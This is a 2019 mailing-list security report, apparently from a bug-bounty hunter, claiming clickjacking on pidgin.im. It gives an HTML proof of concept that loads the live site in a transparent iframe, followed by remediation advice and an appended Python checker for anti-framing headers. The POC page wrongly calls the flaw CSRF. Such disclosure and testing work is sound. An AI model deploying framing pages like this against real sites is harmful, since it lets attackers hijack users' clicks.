Clickjacking in the main domain

Cyber bounty cyberlord0x1 at gmail.com
Sun Jan 20 17:02:37 EST 2019


 Hello Security Team

Description:

Domain: https://pidgin.im

Vulnerability: Clickjacking

Clickjacking (User Interface redress attack, UI redress attack, UI
redressing) is a malicious technique of tricking a Web user into clicking
on something different from what the user perceives they are clicking on,
thus potentially revealing confidential information or taking control of
their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this
website could be at risk of a clickjacking attack. The X-Frame-Options HTTP
response header can be used to indicate whether or not a browser should be
allowed to render a page in a <frame> or <iframe>. Sites can use this to
avoid clickjacking attacks, by ensuring that their content is not embedded
into other sites.
This vulnerability affects Web Server.

POC:

1. Open Notepad and paste the following code:

<html><head>
<title>leaseweb</title>
<style>
/* The original selector "frame" matched no element; the iframe's id is
   "frame", so the id selector "#frame" is needed for the styling to apply. */
#frame {
opacity: 0.5;
border: none;
position: absolute;
top: 0px;
left: 0px;
z-index: 1000;
}
</style>
</head>
<body>
<script>
// Prompt before navigating away from the demo page.
window.onbeforeunload = function()
{
return " Do you want to leave ?";
}
</script>
<p> site is vulnerable for CSRF!</p>
<iframe id="frame" width="100%" height="100%" src="https://pidgin.im"></iframe>
</body>
</html>

2. Save it as <anyname>.html, e.g. s.html.
3. Simply open that file in a browser.

reference :

https://www.owasp.org/index.php/Testing_for_Clickjacking_(OWASP-CS-004)

https://www.pentestpartners.com/security-blog/clickjacking-explained-in-detail/

Impact:

By using the clickjacking technique, an attacker hijacks clicks
meant for one page and routes them to another page, most likely
for another application, domain, or both.

Remediation:

Frame busting technique is the better framing protection
technique.
Sending the proper X-Frame-Options HTTP response headers
that instruct the browser to not allow framing from other
domains.

Thanks !
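The check below is an added example, not part of the original report: it classifies a set of HTTP response headers by whether they carry the anti-framing controls the remediation refers to (X-Frame-Options, plus the Content-Security-Policy frame-ancestors directive that supersedes it), so a defender can verify a fix. The sample header sets are constructed, not captured from pidgin.im; check_url() needs network access.

```python
"""Assess whether HTTP response headers block framing (clickjacking defence)."""
import sys
from urllib.request import Request, urlopen


def parse_csp(csp):
    """Return {directive: [values]} from a Content-Security-Policy header value."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def assess_framing_protection(headers):
    """Return {'protected': bool, 'reason': str}; header names are case-insensitive.

    Browsers that support frame-ancestors give it precedence over
    X-Frame-Options, so CSP is evaluated first.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy")
    if csp:
        fa = parse_csp(csp).get("frame-ancestors")
        if fa is not None:
            if [v.lower() for v in fa] == ["'none'"]:
                return {"protected": True, "reason": "CSP frame-ancestors 'none'"}
            if "*" in fa:
                return {"protected": False, "reason": "CSP frame-ancestors allows any origin"}
            return {"protected": True, "reason": "CSP frame-ancestors restricts to " + " ".join(fa)}
    xfo = lower.get("x-frame-options")
    if xfo is None:
        return {"protected": False, "reason": "no X-Frame-Options or CSP frame-ancestors header"}
    value = xfo.strip().upper()
    if value in ("DENY", "SAMEORIGIN"):
        return {"protected": True, "reason": "X-Frame-Options " + value}
    if value.startswith("ALLOW-FROM"):
        return {"protected": False, "reason": "ALLOW-FROM is obsolete and not honoured by current browsers"}
    return {"protected": False, "reason": "unrecognised X-Frame-Options value: " + xfo}


def check_url(url):
    """Fetch url (network required) and assess its response headers."""
    with urlopen(Request(url, method="GET")) as resp:
        return assess_framing_protection(dict(resp.headers.items()))


# Constructed sample responses for offline use (not real pidgin.im responses).
SAMPLE_MISSING = {"Content-Type": "text/html"}
SAMPLE_XFO = {"Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN"}
SAMPLE_CSP = {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"}

if __name__ == "__main__":
    print(check_url(sys.argv[1]) if len(sys.argv) > 1 else assess_framing_protection(SAMPLE_MISSING))
```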